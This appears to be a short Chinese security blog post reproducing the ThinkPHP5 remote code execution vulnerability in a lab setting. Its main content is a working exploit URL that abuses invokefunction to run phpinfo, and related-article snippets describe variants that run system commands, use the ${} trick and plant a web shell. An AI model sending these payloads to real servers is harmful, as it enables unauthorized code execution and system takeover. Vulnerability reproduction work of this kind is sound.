ThinkPHP5RCE漏洞复现

最新推荐文章于 2025-03-24 18:32:55 发布

大数据安全服务中心

最新推荐文章于 2025-03-24 18:32:55 发布

阅读量363

点赞数

分类专栏：网络安全文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/qq_28771127/article/details/117962837

版权

网络安全专栏收录该内容

1 篇文章

订阅专栏

这篇博客探讨了一种PHP payload的使用，该payload可能导致敏感信息泄露或系统被控制。通过深入解析/index.php的请求参数，文章揭示了如何调用非法函数phpinfo并绕过安全限制。博客还讨论了如何预防此类攻击，包括输入验证、函数白名单和安全配置实践。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Payload：/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

展示

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

大数据安全服务中心

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ThinkPHP 多语言模块RCE漏洞复现

0xSec

12-25

3857

ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初，2007年元旦正式更名为ThinkPHP，并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重易用性。并且拥有众多原创功能和特性，在社区团队的积极参与下，在易用性、扩展性和性能方面不断优化和改进。

vuhub thinkphp-5-rce漏洞复现

qq_46804551的博客

04-24

653

搭建 your-ip:8080 搭建成功漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中，由于框架错误地处理了控制器名称，因此如果网站未启用强制路由（默认设置），则该框架可以执行任何方法，从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

2 条评论您还未登录，请先登录后发表或查看评论

Thinkphp 5.0.24变量覆盖漏洞导致RCE分析

bhegi_seg的博客

07-31

1562

好了，回到正题，继续跟进到877行，

thinkphp 5-rce版本漏洞复现(超详细版)

最新发布

qq_64470109的博客

03-24

306

Thinkphp5x远程命令执行及getshell。

ThinkPHP2--RCE漏洞复现

m0_74402888的博客

05-03

1292

var['\1']="\2" 这里双引号引发函数执行，了解为什么${}会执行，在PHP当中，${}是可以构造一个变量的，{}写的是一般的字符，那么就会被当成变量，比如${a}等价于$a，那如果{}写的是一个已知函数名称呢？()值提取匹配的字符串，有几个括号就代表有几个匹配的字符串，看结果我们就知道，我们的目的是将键和值分别提取出来，所有有两个()，一个匹配键，一个匹配值。$a的执行语句执行了（注意如果要实现该代码需要修改php的版本为5.x的版本）s=a/a/a/${phpinfo()} 其中a随意。

thinkphp5RCE

weixin_45778886的博客

03-07

1983

这里写目录标题加载第三方类库captcha路由。非debugpayload:1.路由检测1.1跟进self::routeCheck1.2跟进Route::check1.2.1在check函数进入$request->method(),1.2.2进入method()函数1.2.3进入__construct函数1.3跟进self::checkRoute1.4 跟进self::checkRule1.5跟进self::parseRule2.路由检测后，进入self::exec函数2.1 跟进exec函数2.2R

ThinkPHP 漏洞复现

weixin_74387022的博客

09-11

888

在ThinkPHP中，captcha 通常是一个内置的功能，用于生成和验证验证码。同时，也可以在表单验证时使用这个验证码来确保用户输入的是正确的验证码在Hackber，POST上传。s=a/a/a/${phpinfo()} ，运行后发现复现成功。在浏览器打开IP+端口8080 ， thinkphp路由的格式是分组/模块/操作名/参数。进入2-rce后运行此靶场 docker-compose up -d。运行此靶场 docker-compose up -d。1.对ThinkPHP2--RCE进行漏洞复现。

thinkphp 5.0.23 rce 漏洞复现

m0_65764670的博客

05-29

658

这里的rce是远程命令，此漏洞利用过程为访问/index.php?进入靶场文件使用docker-compose up -d拉取镜像。使用info 0查看适用版本。设置靶机和攻击机IP。

thinkphp 5.0.23 rce漏洞复现

ffff5的博客

05-19

785

thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架，支持windows/Unix/linux等服务器环境，并且有相当多的CMS是在thinkphp基础上二次开发的。环境搭建使用vulhub搭建环境，过程不赘述。漏洞复现抓包并直接发送下面的流量包，即可利用漏洞进行远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: IP:PORT Accept-Encoding: gzip,

thinkphp -5rce漏洞复现(保姆级教程)

2401_87057954的博客

12-02

1377

不过kali的刷新率一般都是60赫兹所以有点卡顿。打开网页后输入kali的ip:8080即可。docker ps -a查看是否启动环境。1）在url输出关于 PHP 配置的信息。一定要进入该目录下才可以搭建靶场哦。完成以上操作后开始复现漏洞。之后查看shell.php。注意端口号是8080。

thinkphp5 rce

weixin_51558394的博客

08-17

517

thinkphp5 rce

thinphp5rce漏洞复现

mlws1900的博客

07-07

371

docker搭建过程和2rce一样，不多赘述thinkphp2rce漏洞复现_mlws1900的博客-优快云博客环境搭建成功 poc 执行命令把vars[0]=system&vars[1][]=命令漏洞复现成功

ThinkPHP5_RCE

Dikesi的博客

02-10

406

ThinkPHP 5.x版本 RCE漏洞

ThinkPHP5--rce远程代码执行

m0_74402888的博客

04-30

1272

在ThinkPHP5版本中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

Thinkphp 5-RCE漏洞复现

Tender*的博客

08-10

1109

ThinkPHP5披露最多得漏洞就是RCE，其中的影响版本范围非常广漏洞原理其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。影响版本不同版本 payload 不同，且5.13版本后还与debug模式有关漏洞复现进入。

PHP的rce函数,Thinkphp5-1-2-RCE简单分析

weixin_30332165的博客

04-12

504

前言上次出的洞是接近元旦吧，好像刚从南京回学校，要准备烦人的期末，没心思分析，前天我刚考完，今天刚爆的洞洞貌似。然后自己跟着调试了一下。漏洞细节这是复现图前提是要在index.php中禁止报错，其实在生产环境中，开发也会这么做。漏洞点在\thinkphp\library\think\Request.php中的method函数：public function method($origin = fal...

thinkphp5.x系列 RCE总结

weixin_30672019的博客

05-11

2911

Thinkphp MVC开发模式执行流程：首先发起请求->开始路由检测->获取pathinfo信息->路由匹配->开始路由解析->获得模块、控制器、操作方法调度信息->开始路由调度->解析模块和类名->组建命名空间>查找并加载类->实例化控制器并调用操作方法->构建响应对象->响应输出->日志保存->程序...

thinkphp3.2.3 rce漏洞复现

08-12

- *1* [wp 篇 DASCTF Thinkphp 3.2.3RCE复现](https://blog.youkuaiyun.com/weixin_46203060/article/details/119532553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...